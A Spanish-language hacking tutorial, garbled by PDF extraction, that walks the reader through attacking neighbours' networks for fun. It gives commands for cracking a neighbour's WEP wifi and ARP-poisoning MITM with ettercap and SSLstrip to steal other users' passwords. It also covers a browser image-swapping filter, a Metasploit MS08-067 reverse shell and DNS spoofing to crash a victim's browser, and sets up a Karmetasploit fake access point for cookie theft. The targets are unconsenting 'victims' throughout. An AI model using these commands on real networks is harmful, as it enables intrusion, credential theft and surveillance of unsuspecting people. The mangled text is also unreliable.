Jugando-en-La-Red.pdf

JUGANDO EN LA RED

[email protected] Esta obra se encuentra bajo la licencia Creative Commons 3.0 – España:

1

Introducci ó  n    ón  Secci ó  ón   Wireless  Secci ó  ón   Sniffers  Secci ó  ón   Metasploit  Secci ó  ón   DNS-Spoofing  Karmetasploit 

2

Introducci ó  n    ón  Secci ó  ón   Wireless  Secci ó  ón   Sniffers  Secci ó  ón   Metasploit  Secci ó  ón   DNS-Spoofing  Karmetasploit 

2

PASANDO UNA TARDE CON EMOCIÓN Propongamos un escenario: Es domingo por la tarde, la televisión es una una basura (para variar) y estamos aburridos, aburridos, así que decidimos buscar una red wii en nuestro vecindario y aventurarnos en lo desconocido, aquí empie!a nuestra odisea en la que veremos algunas cosas interesantes que podremos "acer para #entretenernos$% Para este tutorial traba&aremos sobre 'actrac  *+2 que *+2 que "a salido "ace poco y contiene  prcticamente todas las aplicaciones que utili!aremos, adems en el caso de la auditoria de redes wii, lleva los drivers para que la mayoría de tar&etas pueda entrar en modo monitor e inyectar% 'actrac se nos nos presenta en ormato .iso para que lo utilicemos desde un cd en modo live cd o desde un -.', aunque tambi/n e0iste la posibilidad de instalarlo en el disco duro o descargarnos una maquina virtual ya preparada y correrla sobre Player % .i para la auditoria de redes wii se desea utili!ar una tar&eta que no sea -.' debemos utili!ar cualquier alternativa que no sea la virtuali!ación% .i este es vuestro caso yo recomiendo crear un -.' live con 'actrac y un buen programa para ello es -netbooin -netbooin%% 3"ora ya es a gusto de cada uno escoger el que mas le interese para traba&ar, aunque aunque tambi/n "ay alternativas algo mas traba&osas que no "e mostrado como crear un -.' persistente con 'actrac o utili!ar irtual'o0 irtual'o0 como  como "e "ec"o yo, e instalar 'actrac en una de sus maquinas virtuales, ya que me daba pere!a registrarme en la pagina de 4are para obtener el Player que aunque es gratuito requiere de registro para descargarlo y despu/s te mandan publicidad% +reo que tambi/n "ay orma de convertir las maquinas virtuales de 4are 4are al ormato reconocido por irtual'o0, irtual'o0, aquí ya es a elección de cada uno escoger la opción que ms se amolde a sus preerencias% Por 5ltimo recordar que es a gusto y #riesgo$ de cada uno reali!ar las tareas que aquí se e0ponen, ya que si alguien abre un agu&ero negro en el proceso no me responsabili!o del caos producido 6)% 'ueno esto es todo, todo, a disrutar y aprender% aprender%  

.aludos,

Aetsu

7

 – Sección Wireless –  1a parte 8o primero que nos interesar "acer es obtener acceso a la red wii ob&etivo, una ve! estemos dentro ya podremos empe!ar a &ugar% Para ello utili!arnos la amosa suite aircrackn! % 9 Para esta sección utili!aremos: acc"anger: Para cambiar la 3+ de nuestra tar&eta wii% 8a .uite 3ircracng: Para el tema de la auditoria wii% • •

8o e0plicar/ bastante metódico y al inal de la sección a;adir/ enlaces a tutoriales complementarios para quien quiera adentrarse ms en el tema o quien no tenga muy claro lo e0plicado aquí% 1% Primero detenemos nuestra intera! (la que usaremos para la auditoria, en mi caso wlan1) y la ponemos en modo monitor% iconig "lan1 down airmonng start "lan1 +on esto ya tendremos nuestra intera! en modo monitor y nuestra intera! pasar a llamarse #$n%:

3"ora cambiaremos la 3+ de nuestra intera! en modo monitor con:

i&c$n&i! mon< '$"n #acc(an!er #  <<:11:22:77::== mon< i&c$n&i! mon< up +on esto ya tendremos la 3+ de nuestra tar&eta cambiada y podemos seguir con la auditoria% 2% 3 continuación mediante air$'u#pn! buscaremos una red con seguridad complicarnos demasiado la vida): airodumpng #$n%

Escogeremos 483>?7 y con sus datos ya podremos proceder a reali!ar un ms concreto: air$'u#pn! " captura )ssi' aa:bb:cc:dd:ee:  c@ mon<

WEP (para no

air$'u#pn!



  Aonde: • • • •

captura es el arc"ivo donde se almacenarn los datos capturados% aa*))*cc*''*ee*&& es el '..BA del punto de acceso% + es el canal del punto de acceso% #$n% es nuestra intera! en modo monitor%

7% -na ve! ya tenemos una terminal capturando los datos vamos a intentar acelerar un poco el  proceso, recordemos que queremos que la columna ,Data del air$'u#pn! llegue a los C<<<< paquetes como mínimo (con menos paquetes puede bastar, la cuestión es ir  probando), para ello utili!aremos el ataque 1-./ Este ataque consiste en dos pasos, asociarnos al punto de acceso e inyectar tráfico en este% En el paso de asociación (desde una terminal nueva) utili!aremos airepla0n!: airepla0n! 1 1< e 483>?7 a aa:bb:cc:dd:ee:  ( <<:11:22:77::== mon<

Aonde: • • • • •

1% es tiempo que pasa entre cada prueba de asociación% WAN23. es el E..BA del punto de acceso% aa*))*cc*''*ee*&& es el '..BA del punto de acceso% %%*11*44*..*33*55 es la 3+ de nuestra tar&eta wii% #$n% es nuestra intera! en modo monitor%

El segundo paso consiste en inyectar traico, para ello abrimos otra terminal y:  airepla0n! . ) aa:bb:cc:dd:ee: ( <<:11:22:77::== mon<

Aonde: • • •

aa*))*cc*''*ee*&& es el '..BA del punto de acceso% %%*11*44*..*33*55 es la mac de nuestra tar&eta wii% #$n% es nuestra intera! en modo monitor% =

% +on esto solo nos queda esperar a tener suicientes ,Data, para ello desde otra terminal e&ecutamos el aircrackn! para que vaya probando con los ,Data que vamos obteniendo "asta que obtengamos la contrase;a, para ello: aircracng captura6/cap

Aonde: •

captura6/cap es el arc"ivo que contiene los paquetes capturados con el airodumpng%

+on esto ya tendremos la contrase;a del punto de acceso y podremos acceder a este con lo que ya "emos acabado esta sección%

7 In&$r#aci$n interesante s$)re el te#a* • • •

Dacing 4ireless con 3ircracng (cirado 4EP  odos los ataques)% 3saltando redes 4P3 con aircracng% 3saltando redes 4BFB (4EPG4P3) en pd para descargar%

C

4a parte Ha "emos observado como sería el proceso para acceder a una red wii con cirado 4EP, pero, lo que a"ora veremos, ser como "acerlo de orma ms rpida o automtica% Para ello nos valdremos de dos "erramientas, la primera es "lan'ecr0pter que nos permite obtener con apenas 5 ,Data las contrase;as (por deecto) de las redes WAN288% 8a segunda es 9ri# Wepa, que nos permite "acer lo que "emos visto en la primera parte (adems de otras muc"as cosas) de orma automtica con una I-B%

9 Wlan'ecr0pter: +omo "e comentado antes "lan'ecr0pter nos permite obtener los password por deecto de las redes cuyo E..BA sea 483>?JJ con una peque;a cantidad de KAata acortndonos enormemente el tiempo necesario para obtener la contrase;a, aunque no viene por deecto con 'actrac  por tanto si queremos obtener la ultima versión tenemos que descargarlo: "ttp:GGwww%wiiway%orgGarc"ivosGwlandecrypter1%7%1%tar%g! -na ve! descargado ya podremos utili!arlo, no "ace alta instalarlo ya que dentro ya viene el e&ecutable compilado y listo para utili!ar% Para utili!arlo partiremos del punt$ 4 'e la pri#era parte  donde ya tenemos al airodumpng capturando paquetes:

+omo vemos ya tenemos 11 KAata, cantidad insuiciente para obtener la contrase;a (necesitaríamos ms de 2<%<<< como mínimo), pero con "lan'ecr0pter podemos crear un diccionario con todos los password por deecto para ese E..BA, para ello:

/:"lan'ecr0pter aa:bb:cc:dd:ee: 483>?F@ diccionario donde: • • •

aa*))*cc*''*ee*&& : Es el '..BA del punto de acceso% WAN2;+: Es el E..BA del punto de acceso% 'icci$nari$: El nombre del diccionario que crearemos con las posibles claves%

L

Por 5ltimo solo nos queda lan!ar el aircrackn! con el diccionario que acabamos de crear:

aircrackn! " diccionario captura%cap donde: • •

'icci$nari$: Es el diccionario creado antes con el "lan'ecr0pter% captura/cap: Es el arc"ivo de captura generado con el air$'u#pn!%

7 9ri# Wepa* Este programa se encuentra en 'actrac , podemos encontrarlo en

Menu < =acktrack < Ra'i$

Net"$rk Analisis < >%411 < Crackin! < 9ri#Wepa/ 9ri# Wepa nos orece una intera! desde la que podemos reali!ar los dierentes ataques a cirados 4EP o 4P3 de una orma cil y cómoda% Para esta prueba lo utili!aremos con la inalidad de obtener la contrase;a de una red 4EP con E..BA 483>?F@% +uando tengamos el programa corriendo se nos preguntar que intera! queremos poner en modo monitor, la seleccionamos y el mismo se encargar de ello%

M

3 continuación en Inter&ace seleccionaremos nuestra intera! en modo monitor y pulsaremos el  boton Start scan, antes podemos seleccionar sobre que canal traba&ar Grim Wepa o seleccionarlos todos (All C(annels)% 3l "acer esto veremos como tambi/n "ay una terminal con airodum-ng  uncionando% -na ve! encontremos la red que queremos auditar pulsamos en St$p scannin! %

3"ora una ve! tengamos nuestro ob&etivo, en mi caso 483>?F@ debemos seleccionar el tipo de ataque, para ello abrimos el desplegable de Attack #et($' y lo seleccionaremos ARP-Replay (ataque 1+3 visto en la primera parte), adems podemos probar la inyección con el botón que "ay a su lado Test in?ecti$n/ Ta#)i@n  podemos seleccionar la velocidad de inyección en In?ecti$n rate ppsB o seleccionar un cliente asociado con C($$se client/ @

-na ve! este todo listo ( ARP-Replay en Attack #et($') pulsamos en Start Attack y veremos al lado del botón los paquetes capturados vlidos, adems de una ventana con el airodum-ng  y el aireplay-ng %

3 partid de 1<%<<< paquetes capturados el programa empe!ar a intentar obtener la contrase;a, si somos impacientes podemos pulsar nosotros el botón de Start Crackin!/ 3l inal cuando obtengamos la contrase;a la veremos en la parte inerior: 1<

11

 – SECCION SNI;;ERS –  -na ve! obtenida la contrase;a ya tendremos acceso a la red, y por tanto estaremos en AN con todos los equipos conectados al punto de acceso con lo que podremos desde obtener las contrase;as que via&an por la red "asta acceder a su pc o de&ar ordenadores sin acceso a internet% 9 Para esta sección utili!aremos: 'actrac  *2: raba&aremos sobre este sistema operativo basado en -buntu M%1< Ettercap gt: -n snier  de traico de red% ..8.trip : .nier para contrase;as encriptadas% 4ires"ar : -n programa para el anlisis de redes% • • • •

Esta sección la ocupan los sniers, de los que veremos 7 como son Ettercap, ..8.trip y 4ires"ar % 9 Empe!ando por ettercap vemos que es un programa que nos permite sniar el trico de red y obtener así las contrase;as de otros usuarios de nuestra red que via&en por esta, adems tambi/n  permite leer, por e&emplo, las conversaciones de programas de mensa&ería instantnea o ver las  pginas que visita nuestra víctima% -na ve! estemos listos para empe!ar arrancamos ettercap , con lo que podemos o bien abrirlo desde el menu de 'actrac( Menu N =acktrack  N Priile!e Escalati$n  N Sni&&ers N Ettercap 9T  ), o bien desde una terminal con:

ettercap 9 y tendremos la intera! grica de ettercap % ambi/n tiene una basada en las librerías ncurses (ettercap -C ) o usarlo en modo te0to( ettercap T)%

3"ora veamos que tenemos que "acer para "acer un ataque B: 1% Pesta;a Sni&&  < Uni&ie' Sni&&in!% 2% .eleccionamos la intera! que esta conectada a la red que queremos sniar, despu/s le damos a OAceptarO%

12

7% Pesta;a $st < Scan &$r ($sts % En la parte de aba&o de la pantalla aparecer algo como O X osts added to te osts list...O (J sera un numero correspondiente al numero de maquinas conectadas a la red)% % Pesta;a $st N $st list% 3"ora veremos las BPs de las maquinas conectadas, "ay que tener en cuenta que el router tambi/n aparece%

=% .eleccionamos la BP del ordenador a atacar y pulsamos OA'' t$ Tar!et 1O, despu/s el router OA'' t$ Tar!et 4 O%

17

C% Pesta;a Mit# < ARP P$is$nin!% 3"ora marcamos la pesta;a O Sniff remote connectionsO y pulsamos OAceptarO%

L% Pesta;a Start < Start sni&&in!%

C$n est$ estare#$s sni&&an'$ el tra&ic$ 'e re'/ M% Pesta;a Fie" N C$nnecti$ns% 3quí podemos ver todas las cone0iones y si "acemos doble clic sobre alguna podemos ver los datos que contiene, entre ellos conversaciones de programas de mensa&ería instantnea, usuarios y contrase;as, etc%

1

9 >uestro segundo snier es SSStrip que nos permite obtener contrase;as que via&an ciradas  por la red% 'actrac  ya lo lleva aunque lleva una versión antigua (la <%C) así que nos descargaremos la ultima versión la <%L% 8a encontraremos en: "ttp:GGwww%t"oug"tcrime%orgGsotwareGsslstripG -na ve! la descarguemos lo e0traemos y dentro encontraremos el script escrito en p0t($n(grandioso lengua&e), por tanto dependeremos de  pyton para "acerlo uncionar% 3ntes de continuar tenemos que saber que SSStrip tambi/n se basa en el ataque MITM como ettercap , así que tenemos dos opciones, aprovec"arnos de este 5ltimo (ettercap) para reali!ar un MITM o utili!ar arpsp$$&  para crear el nuestro, yo e0plicar/ ambos, es decisión de cada uno escoger el que preiera% •

Met$'$ arpsp$$& : 1% 3 continuación abrimos una s"ell y ponemos:

ec($ G1H < :pr$c:s0s:net:ip3:ip2&$r"ar' 2% 3"ora reali!amos el ataque !"#!$ arpsp$$& i intera!?redQ t ip?victimaQ ip?routerQ a modo de e&emplo arpsp$$& i wlan< t 1@2%1CM%1%1<< 1@2%1CM%1%1 7% 3brimos otra s"ell y cambiamos la redireccion de puertos usando las iptables

ipta)les t nat A PREROUTIN9 p tcp 'estinati$np$rt >% ? REDIRECT t$p$rts 1%%%% •

M@t$'$ ettercap* El m/todo ettercap simplemente consiste en utili!ar el ataque aprendido en la sección anterior% -na ve! tenemos el B traba&ando lan!amos ..8.trip(desde dentro de la carpeta donde lo "emos e0traído): 1%

p0t($n sslstrip/p0 "  R nombre?del?arc"ivo?de?captura N a modo de e&emplo

p0t($n sslstrip/p0 "  captura% 2% .i queremos ver en tiempo real la inormación obtenida abrimos otra s"ell y:

tail &  R nombre?del?arc"ivo?de?captura N a modo de e&emplo

tail & captura 7% Para terminar si posteriormente queremos ver el ic"ero de captura "acemos: cat R nombre?del?arc"ivo?de?captura N o a modo de e&emplo cat captura

1=

9 El tercer snier es Wires(ark  uno de los me&ores programas para anali!ar el traico de red con gran cantidad de opciones y iltros% +omo traba&amos con 'actrac  ya disponemos de Wires(ark , sino podemos instalarlo bien desde los repositorios o bien descargando el código uente desde su pgina web% -na ve! arrancado el snier veremos algo como esto:

3"ora iremos a la pesta;a Capture  N Opti$ns y nos aparecer esta ventana:

En inter&ace seleccionamos la tar&eta con la que queremos sniar el traico% En Capture &ilter podemos ver una serie de iltros para que acilitar la b5squeda de los datos que nos interesen (para el tutorial no pondremos ninguno)% -na ve! estemos listos pulsaremos Start y el programa comen!ara a "acer su unción% 1C

+omo veremos la pantalla se divide en tres partes, las que nos interesan son la superior que contiene todos los paquetes capturados y la inerior que contiene el contenido de cada paquete% En la pantalla superior, en la columna que pone In&$ podemos ver una indicación de lo que contiene el paquete% Por e&emplo si queremos obtener las conversaciones de programas de mensa&ería nos interesar que la parte de Bn&$ empiece por !%G% Para terminar la captura vamos a Capture  N St$p% 3l salir del programa o cerrar la sesión nos  pedir si queremos guardar la captura, ponemos que no y listo%

7 Otras &unci$nes 'e l$s sni&&er* 3 parte de sniar el traico de red con wires"ar y ettercap podemos "acer otras cosas para entretenernos% En este tutorial veremos el programa tcpJtract que lo utili!aremos &unto con Wires(ark  y tambi/n &ugaremos con un par de plu!ins 'el Ettercap %

TCP8TRACT Este programa permite obtener las imgenes que "ubiese entre los paquetes guardados en la captura% amos a verlo mas claro en un e&emplo% Primero, puesto que 'actrac  no lo incluye tendremos que instalarlo: apt!et install tpc0tract una ve! instalado: 1 S +reamos una carpeta en cualquier directorio: #k'ir wire c' wire #k'ir arc"ivos 1L

2 S 3rrancamos el Wires(ark  y "acemos lo anterior para obtener paquetes, v/ase N Opti$ns, seleccionamos la intera! y le damos a Start% 3"ora iremos a Ioogle y buscaremos imgenes en el:

+omo vemos el

Captura

Wires(ark  "a capturado los paquetes:

7 S ;ile N Sae as :

1M

Aespu/s elegimos la carpeta creada anteriormente y le ponemos un nombre, en este caso le  pondr/ capturas%  S -na ve! ec"o esto vamos a una terminal, nos dirigimos a la carpeta creada antes ( &ire) y  ponemos: tcpJtract &ile captura $utput arc"ivos y aparecer esto:

+on esto se generaran en la carpeta arc"ivos todas las imgenes encontradas en #captura

%$.i alla el comando

tcpJtract &ile captura $utput arc"ivos repetirlo "asta que uncione, ya que algunas veces alla% 1@

ETTERCAP   ISOATE Ttra cosa que podríamos "acer a nuestra victima sería de&arla sin Bnternet% Para ello nos valdremos del plugin isolate. Para esta parte del tutorial partiremos de lo que "emos visto antes con Ettercap , es decir, partimos desde que "emos conseguido "acer un B y entonces iremos a Plu!ins N Mana!e plu!ins  y aparecer:

-na ve! allí "acemos doble clic en isolate y en breve (a veces tarda un poco) de&aremos a nuestra víctima sin Bnternet%

2<

ETTERCAP   ;ITRO IMA9ENES 3ntes "emos utili!ado un iltro que nos proporcionaba Ettercap , pero esta ve! nos descargaremos uno y lo #prepararemos$ para que pueda utili!arlo nuestro programa% .obre la utilidad de nuestro plugin cabe decir que cambiara las imgenes del navegador de nuestra víctima por la que nosotros esco&amos% 8o primero sera obtener el plugin: "ttp:GGwww%irongee%comGi%p"pUpageVsecurityGettercapilter , sino quer/is descargarlo aquí est:

################################################################## ########## # # # Jolly Pwned -- ig.filter -- filter source file # # # # By Irongeek. based on code from ALoR & a!A # # Along wit" some "el from $e% and on.dmml # # "tt'((etterca.sourceforge.net(forum(%iewtoic.")t*+, # # # # "is rogram is free software/ you can redistribute it and(or modify # # it under t"e terms of t"e !0 !eneral Public License as ublis"ed by # # t"e 1ree 2oftware 1oundation/ eit"er %ersion + of t"e License3 or # # 4at your otion5 any later %ersion. # # # ############################################################################ if 4i.roto ** 6P && tc.dst ** ,75 8 if 4searc"49AA.data3 :Accet-;ncoding:55 8 relace4:Accet-;ncoding:3 :Accet-Rubbis"<:5/ # note' relacement string is same lengt" as original string msg4:=aed Accet-;ncoding<>n:5/ ? ? if 4i.roto ** 6P && tc.src ** ,75 8 relace4:img src*:3 :img src*>:"tt'((www.irongeek.com(images(ollywn.ng>: :5/ relace4:I@! 2R6*:3 :img src*>:"tt'((www.irongeek.com(images(ollywn.ng>: :5/ msg4:1ilter Ran.>n:5/ ?

8o copiamos y lo guardamos en un arc"ivo con e0tension % filter   ' para este e&emplo yo lo llamar/ # f"magenes.filter(.  NOTA$ )onde pone ttp$**&&&.irongee.com*images*,ollyp&n.png  deemos sustituirlo por la direccin de la imagen que queremos que /ea nuestra /0ctima.

-na ve! tengamos nuestro arc"ivo .filter  tenemos que convertirlo a un ormato que Ettercap pueda leer (eJtensi$n /e& ) , para ello: etter&ilter Bmagenes%ilter $ Bmagenes%e  +on el arc"ivo en ormato .ef en nuestro poder, ponemos Ettercap  con el MITM y cargamos nuestro plugin con Plu!ins N $a' a Plu!in % 3quí seleccionamos nuestro arc"ivo  .ef  con lo que ya solo quedar desde Plu!ins N Mana!e plu!ins seleccionarlo como con el isolate y molestar a nuestra víctima cambindole las imgenes que aparecen en su navegador por las que nosotros deseemos% 21

 – SECCION METASPOIT –  Dasta a"ora "emos atacado a nuestras víctimas al a!ar sin saber apenas nada de su sistema, a"ora vamos a adentrarnos un poco ms en esta dirección y veremos los equipos que se encuentran en nuestra red y conoceremos algo de sus sistemas% Para este traba&o utili!aremos nuestro amigo n#ap, aunque primero deberíamos saber cual es nuestra sunet  para poder lan!ar n#ap con mas precisión (y con un tiempo de respuesta menor):

i&c$n&i! wlan< K !rep WAirec% Bnet:W donde &lan es la intera! que tenemos conectada a Bnternet% 3quí nos mostrara nuestra ip, para este e&emplo supongamos que es 1@2%1CM%<%17, entonces lan!aremos n#ap de la siguiente orma: n#ap A 1@2%1CM%<%X con lo que obtendremos inormación variada de todos los equipos de nuestra subnet, ya sea la 3+, los puertos abiertos adems de los servicios que corren por estos% eamos que "emos obtenido:

emos que tenemos una maquina en la red con 4indows JP adems de los puertos que tiene abiertos% +omo esto es a modo de demostración de lo que es capa! #etaspl$it "e puesto este JP  porque es vulnerable, y aunque es preocupante, a5n "ay gente en sus casas que los tiene como este%

22

9 Empecemos a"ora con

#etaspl$it:

Primero desde una terminal arrancamos #etaspl$it con:

#s&c$ns$le ardar un poco pero nos mostrara una bonita pantalla de presentación y con ello el corriendo:

#etaspl$it

3 continuacion nos aprovec"aremos de una vulnerabilidad en el puerto = ya que como "emos visto en nmap lo tiene abierto 1  Ponemos:

use e0ploitGwindowsGsmbGms
s($" pa0l$a's esto nos mostrara una larga lista de  payloads, pero a"ora usaremos el # sell2re/erse2tcp$% 7 S .eleccionamos el payload  con:

set PALOAD windowsGs"ell?reverse?tcp

  Podemos ver las opciones del  payload  con:

s($" $pti$ns 27

=  .eleccionamos la ip del ob&etivo:

set ROST Rip2o,eti/oN C  H la nuestra:

set OST Rip2nuestraN

L  Por 5ltimo lan!amos el

eJpl$it: eJpl$it

2

+on todo esto ya tendríamos una consola en el sistema víctima sin que nuestro ob&etivo se diese cuenta%

EN RESUMEN* 1 7 4 7 . 7 3 7 5 7

use e0ploitGwindowsGsmbGms
.i quer/is mas ormación sobre esto aquí ten/is una estupenda guía de introducción a #etaspl$it: YutorialZ +onociendo etasploit Framewor Y+oncluidoZ por Rcart

Metaspl$it orece una ininidad de posibilidades, pero con esto queda claro una muestra de su  potencial%

2=

 – SECCION DNSSPOO;IN9 –  1a parte – Intr$'ucción En esta ultima sección vamos a ver como "acer que nuestra víctima acceda a las paginas web que nosotros queramos en lugar de acceder a las suyas propias% Para ello utili!aremos a nuestro amigo ettercap con un MITM y su plugin dns2spoof'  pero, esta ve!, cambiaremos la intera! I[  por la intera! ncurses desde una terminal% Empe!amos arrancando ettercap  con ncurses :

ettercap C

3 continuación vamos a Sni&&  N Uni&ie' Sni&&in! y nos pedir escribir la intera! con la que queremos sniar el trico%

Pulsamos nter  y despu/s vamos a $st N Scan &$r $st  con lo que buscara los ost  de nuestra red% -na ve! "aya escaneado la red en $st N $st list:

2C

-na ve! veamos los ost , tendremos que seleccionar los ob&etivos como "acíamos con la intera! grica:

+omo vemos tenemos que poner los ob&etivos (el router y la victima) entre #:ip< : % 3"ora antes de continuar con el dns-spoofing  vamos a ver el arc"ivo donde se almacenan las direcciones y a donde son redirigidas% Este arc"ivo es:

:usr:s(are:ettercap:etter/'ns  y vamos a ver la parte de su contenido que nos interesa:

En la imagen vemos #icr$s$&t/c$# A 1+>/1>4/1+/5 esto signiica que una ve! el dns-spoofing este uncionando cuando nuestra víctima intente acceder a microsoft.com sera redirigida a 145.156.147.87  que es &&&.linu9.org . Este es el etter/'ns que trae ettercap  por deecto, nosotros  podemos cambiarlo a nuestro gusto (despu/s e0plicare una utilidad #interesante$ para esto)% 'ueno ya tenemos nuestro etter/'ns conigurado, a"ora tenemos que cargarlo en ettercap , para ello continuamos en donde "abíamos de&ado nuestro  sniffer  y vamos a Plu!ins N Mana!e 'e Plu!ins, con lo que nos aparecer una ventana como esta:

2L

Dacemos doble clic sobre 'ns2sp$$&  y veremos como el Q% de la i!quierda pasa a ser Q1 con lo que el plugin ya esta activado% >os queda el 5ltimo a&uste para el !an "n #e !iddle' vamos a Mit# N Arp P$is$nin!  y en la ventana que aparecer ponemos:

Ha solo queda Start N Start Sni&&in!:

Entonces cuando nuestra victima acceda a micro:oft.com :

2M

4a parte – $ 'ierti'$ 3ntes de empe!ar esta parte cabe aclarar que lo reali!ado aquí probablemente se puede "acer de otra orma mas simple y sin tanto traba&o, pero la intención de este tutorial es mostrar lo bsico, es ya tarea de cada uno e0plorar las posibilidades% Para esta parte necesitaremos: 'actrac  *+2% -na maquina virtual con -buntu 1<%< o 1<%1<  (o un ordenador real da igual)% -na victima inocente con 4indows JP% • • •

9 Fa#$s a plantear el escenari$* < Estamos en la misma red local que nuestra victima que tendr un Win'$"s 8P, y lo que "aremos sera aprovec"arnos de un modulo del #etaspl$it que produce una dos cuando la victima se conecta con "nternet 9plorer  a una dirección concreta que nosotros le acilitaremos, cosa que  podría ser diícil de conseguir sin ingeniería social, pero que nosotros podemos conseguir sin que nuestro ob&etivo se entere% < Entonces la situación quedara asi: =actrack  lan!ar el modulo de #estaspl$it con ob&etivo el Win'$"s 8P, y nos proporcionar una dirección (ttp% Entonces en nuestro servidor web con U)untu "aremos que cuando alguien se conecte a el sea redirigido a la dirección que nos proporcionaba =acktrack  provocndole una denegación de servicio% Para esta direccional utili!aremos ettercap - 'ns2sp$$&  redirigiendo la  pagina de Ioogle a nuestro servidor web, ya que ettercap  no puede redireccionar a una dirección comple&a como la que nos proporciona #etaspl$it, de a"í que sea necesario utili!ar nuestro servidor web%

7 E#pea#$s* Para empe!ar prepararemos nuestras maquinas virtuales y la que #ms$ traba&o requiere es la de U)untu% 3sí que vamos a instalar lo necesario: su'$ apt!et install  mysqlserver=%1 apac"e2 p"p= p"p=mysql libapac"e2modaut"mysql 3"ora reiniciamos y.ql y 3pac"e con: su'$ GetcGinit%dGapac"e2 restart su'$ service mysql restart 8isto, las paginas web se almacenan en :ar:""", aunque ya iremos despu/s a poner nuestra web% Fuente: +omo instalar 3pac"e\ysql\PDP en -buntu 1<%< 9 quina de =acktrack3 : 1] 9 erminal y e&ecutamos #etaspl$it:

#s&c$ns$le 2] 9 use au0iliaryGdosGwindowsGbrowserGms<@?
7] 9 3"ora ponemos nuestra ip:

set SRFOST Rip victimaN en mi caso:

set SRFOST 1@2%1CM%<%2<1 2@

] 9 8an!amos el modulo:

run

Perecto, ya tenemos la dirección que acilitaremos a nuestra víctima, pero y si ^ no quiere aceptarla, _que "acemosU Para esto tenemos el 'nssp$$&in!, para que se conecte a la web que queramos sin que se de cuenta% 9 quina de U)untu 1%/%3 : Entonces nuestro siguiente paso es ir a la maquina en que tenemos nuestro servidor web, en mi caso la de U)untu y vamos al directorio :ar:"""/ 3lli modiicamos el arc"ivo in'eJ/(t#l y lo de&amos como este:   ;tml<   ;ead<   ;title?"@BRCR%=B DEF#F#B1?RHttp$**146.175..61$55*DaydG5Ag@tctB<   ;*ead<   ;ody< spere unos segundos...   ;*ody<   ;*tml<   Aonde URL=http://!".#$.%."%:$%$%/Cay&'$A()t*ct+ es la dirección que nos proporciona 'actrac (cada ve! cambia)% +on esto ya tenemos nuestro servidor web listo y queda el  para que redireccione Ioogle a la BP de nuestro servidor%

'ns2sp$$&  lan!ado desde =acktrack

7<

9 quina de =acktrack3 : Editamos el :usr:s(are:ettercap:etter/'ns  y redirigimos la pgina que queramos a nuestra mquina con U)untu, el ic"ero etter/'ns  quedar así:

8o siguiente es usar ettercap  como "emos visto en la 1a parte y reali!ar un 'ns2sp$$&in! para que nuestra víctima al conectarse a Ioogle o Faceboo con Internet EJpl$rer #muera $% 9 quina de Win'$"s 8P: +uando nuestro inocente amigI acceda a una de las paginas mencionadas antes vera esto:

y =OOM % 9 quina de =acktrack3 : Esto es lo que veremos cuando alguien acceda a nuestra dirección (bien sea redirigido o de orma directa):

71

+on esto acabamos esta sección, aunque "ay que tener en cuenta como "e dic"o al principio de ella que esto es instructivo, es una orma de "acer las cosas que no tiene porque uncionar bien  porque el BE no sea vulnerable o porque el dns?spoo no nos unciona o por $tr$s #$ti$s ari$s ,  pero, la idea de redireccionar la podremos utili!ar en muc"os otros e0ploits que requieran que la víctima acceda a una pgina concreta modiicada para la ocasión, o para crear clones de pginas webs conocidas con intención de obtener los datos privados de un usuario, aquí nuestra imaginación es la que pone el tope :)%

72

 – SECCION ARMETASPOIT –  Demos visto lo que podemos "acer si nos adentramos en la red de alguien, pero, y sino nos apetece "acer nada, _que "acemosU 8a respuesta es simple, que vengan nuestras víctimas a nosotros creando un punto de acceso also  para que se conecten% Para esto utili!aremos ar#etaspl$it% Esto nos permitir robar las cooies de nuestra victima o si su ordenador es vulnerable a uno de los eJpl$its que cargue #etaspl$it  podemos incluso obtener una s"ell en su pc% Primero preparamos el terreno, siempre partiendo de que utili!amos 'actrac  rc2, para ello descargamos el script kar#a/rc : "!et "ttp:GGmetasploit%comGusersG"dmGtoolsGarma%rc

-na ve! descargado vamos a modiicar el arc"ivo :etc:'(cp.:'(cp'/c$n& ("aced primero una copia del original si lo deseis) y tiene que quedar así: option domain-name-ser/ers 1...1 default-lease-time 7 ma9-lease-time J6 ddns-update-style none autoritati/e log-facility localJ  sunet 1... netmas 688.688.688. K  range 1...1 1...68L option routers 1...1 option domain-name-ser/ers 1...1  M

77

Para acabar la puesta a punto de armetasploit podemos editar el ic"ero :$pt:#etaspl$it.:#s&.:'ata:eJpl$its:capture:(ttp:sites/tJt donde estn los lugares de los que #etaspl$it intentar robar las cooies, aquí podemos a;adir nosotros los que queramos%

-na ve! est/ todo listo ponemos nuestra tar&eta en modo monitor, para ello(la intera! es wlan<):

air#$nn! start  wlan< y cambiamos la 3+ de nuestro punto de acceso (la intera! en modo monitor es mon<):

i&c$n&i! mon< '$"n  #acc(an!er r  mon<  i&c$n&i! mon< up

+on la intera! lista ya podemos crear nuestro punto de acceso con

air)asen!*

air)asen! P C .% c C e G483>?LF mon< 7

donde WHAF2JC  es el nombre que queremos darle a nuestro also punto de acceso y mon es nuestra intera! en modo monitor% El paso anterior quedara una nueva intera! at a la cual (desde otra terminal) le damos una ip y activamos el servidor d"cp:

i&c$n&i! at< up 1<%<%<%1 net#ask 2==%2==%2==%< '(cp'. c&  GetcGd"cp7Gd"cpd%con at<

 +omo ultimo paso arrancaremos

#etaspl$it con ,arma$ #s&c$ns$le r arma%rc

7=